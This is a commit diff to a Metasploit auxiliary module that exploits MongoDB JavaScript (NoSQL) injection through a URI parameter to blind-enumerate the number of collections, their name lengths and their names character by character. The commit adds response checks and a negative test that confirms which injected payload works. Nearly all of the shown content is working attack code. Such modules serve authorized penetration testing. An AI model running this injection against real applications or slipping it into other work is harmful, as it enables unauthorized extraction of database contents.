Update mongodb_js_inject_collection_enum.rb
This adds a bit more error handling, and better decision making in regards to false responses.unstable
Brandon Perry
parent
4071fb332b
commit
2663af986b
|
|
@ -47,6 +47,10 @@ class Metasploit4 < Msf::Auxiliary
|
||||||
'uri' => uri.sub('[NoSQLi]', '')
|
'uri' => uri.sub('[NoSQLi]', '')
|
||||||
})
|
})
|
||||||
|
|
||||||
|
if !res
|
||||||
|
fail_with("Server did not respond in an expected way.")
|
||||||
|
end
|
||||||
|
|
||||||
pay = ""
|
pay = ""
|
||||||
fals = res.body
|
fals = res.body
|
||||||
tru = nil
|
tru = nil
|
||||||
|
|
@ -57,14 +61,27 @@ class Metasploit4 < Msf::Auxiliary
|
||||||
'uri' => uri.sub('[NoSQLi]', payload[0])
|
'uri' => uri.sub('[NoSQLi]', payload[0])
|
||||||
})
|
})
|
||||||
|
|
||||||
if res.body != fals and res.code == 200
|
if res and res.body != fals and res.code == 200
|
||||||
print_status("Looks like " + payload[0] + " works")
|
print_status("Looks like " + payload[0] + " works")
|
||||||
tru = res.body
|
tru = res.body
|
||||||
|
end
|
||||||
|
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri' => uri.sub('[NoSQLi]', payload[0].sub('true', 'false').sub('this', '!this'))
|
||||||
|
})
|
||||||
|
|
||||||
|
if res and res.body != tru and res.code == 200
|
||||||
|
vprint_status("I think I confirmed with a negative test.")
|
||||||
|
fals = res.body
|
||||||
pay = payload[1]
|
pay = payload[1]
|
||||||
break
|
break
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
if pay == ''
|
||||||
|
fail_with("Couldn't detect a payload, maybe it isn't injectable.")
|
||||||
|
end
|
||||||
|
|
||||||
length = 0
|
length = 0
|
||||||
vprint_status("Getting length of the number of collections.")
|
vprint_status("Getting length of the number of collections.")
|
||||||
(0..100).each do |len|
|
(0..100).each do |len|
|
||||||
|
|
@ -73,7 +90,7 @@ class Metasploit4 < Msf::Auxiliary
|
||||||
'uri' => uri.sub('[NoSQLi]', pay.sub('[inject]', str))
|
'uri' => uri.sub('[NoSQLi]', pay.sub('[inject]', str))
|
||||||
})
|
})
|
||||||
|
|
||||||
if res.body == tru
|
if res and res.body == tru
|
||||||
length = len
|
length = len
|
||||||
print_status("#{len} collections are available")
|
print_status("#{len} collections are available")
|
||||||
break
|
break
|
||||||
|
|
@ -92,7 +109,7 @@ class Metasploit4 < Msf::Auxiliary
|
||||||
'uri' => uri.sub('[NoSQLi]', pay.sub('[inject]', str))
|
'uri' => uri.sub('[NoSQLi]', pay.sub('[inject]', str))
|
||||||
})
|
})
|
||||||
|
|
||||||
if res.body == tru
|
if res and res.body == tru
|
||||||
name_len = k
|
name_len = k
|
||||||
print_status("Length of collection #{i}'s name is #{k}")
|
print_status("Length of collection #{i}'s name is #{k}")
|
||||||
break
|
break
|
||||||
|
|
@ -109,7 +126,7 @@ class Metasploit4 < Msf::Auxiliary
|
||||||
'uri' => uri.sub('[NoSQLi]', pay.sub('[inject]', str))
|
'uri' => uri.sub('[NoSQLi]', pay.sub('[inject]', str))
|
||||||
})
|
})
|
||||||
|
|
||||||
if res.body == tru
|
if res and res.body == tru
|
||||||
name << c
|
name << c
|
||||||
break
|
break
|
||||||
end
|
end
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue